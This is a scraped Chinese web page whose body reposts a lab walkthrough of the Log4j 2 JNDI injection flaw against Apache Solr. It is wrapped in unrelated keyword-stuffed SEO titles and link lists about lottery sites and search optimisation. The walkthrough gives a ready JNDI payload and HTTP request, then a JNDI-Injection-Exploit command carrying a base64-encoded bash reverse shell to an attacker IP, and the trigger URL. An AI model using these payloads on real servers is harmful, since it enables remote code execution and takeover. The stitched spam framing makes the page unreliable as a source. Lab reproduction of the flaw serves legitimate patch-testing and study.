当前位置: 首页 > news >正文

私人让做彩票网站吗seo网站关键词优化方法

私人让做彩票网站吗,seo网站关键词优化方法,文章视频类网站怎么做测试,个人做房产网站Apache Log4j 2 是Java语言的日志处理套件,使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似于${jndi:ldap://evil.com/example}的lookup用于进行JNDI注入,执行任意代码。…

Apache Log4j 2 是Java语言的日志处理套件,使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似于`${jndi:ldap://evil.com/example}`的lookup用于进行JNDI注入,执行任意代码。

1.服务启动后,访问`http://your-ip:8983`即可查看到Apache Solr的后台页面。

2.`${jndi:dns://${sys:java.version}.example.com}`是利用JNDI发送DNS请求的Payload,我们将其作为管理员接口的action参数值发送如下数据包:

GET /solr/admin/cores?action=${jndi:ldap://${sys:java.version}.example.com} HTTP/1.1
Host: your-ip:8983
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Connection: close

3.我们可以在DNS日志平台收到相关日志,显示出当前Java版本:

4.利用工具JNDI-Injection-Exploit-1.0-SNAPSHOT-all获得shell,

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjY0LjQzLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "192.168.64.43"

访问下面链接,成功反弹

http://192.168.188.128:8983/solr/admin/cores?action=${jndi:ldap://192.168.64.43:1389/08zqfe}

参考:hrrps://blog.csdn.net/Bossfrank/article/details/130148819

http://www.tj-hxxt.cn/news/6401.html

相关文章:

  • 皇马logo做网站做网站需要准备什么
  • 秦皇岛政府网站官网网站被禁用如何解决
  • 广州海珠区最新疫情济宁seo公司
  • 商务网站创建方案网站优化推广招聘
  • 用html做卖珠宝的网站公司网站免费建站
  • 福州如何做百度的网站百度推广app下载官方
  • 做职业规划的网站郑州关键词排名顾问
  • 湛江专业建站推广机构营销宣传图片
  • 家装公司需要装修资质吗杭州seo培训
  • 网站首页广告教育培训机构排名前十
  • 有交做拼多多网站的吗哪个搜索引擎最好
  • 个人网站做淘宝客犯法吗nba中国官方网站
  • 百科网站开发西安网站定制开发
  • 青岛企业网站seo技巧安阳seo
  • 做网站平台难在哪里合肥网站优化推广方案
  • 有限公司和公司的区别深圳seo公司助力网络营销飞跃
  • 网站开通流程不受国内限制的浏览器
  • 做土特产的网站有哪些阿里巴巴国际站运营
  • 企业网站建设需要什么百度网盘app怎么打开链接
  • 网站开发合作合同网站建设制作专业
  • 国际国内新闻最新消息今天云优化软件
  • 汕头市网站建设公司域名注册费用
  • 网站开发主要包括的事项百度seo规则
  • 网站策划包括什么电商引流推广方法
  • 做的网站用户密码在哪里找如何开展网络营销活动
  • 无锡网站制作8汕头seo按天付费
  • 乐清网络网站建设公司网站制作费用
  • 衢州网站建设找哪家谷歌seo 优化
  • 房天下怎样快速做网站肇庆seo优化
  • 网上的彩票网站是怎么做的同城推广引流平台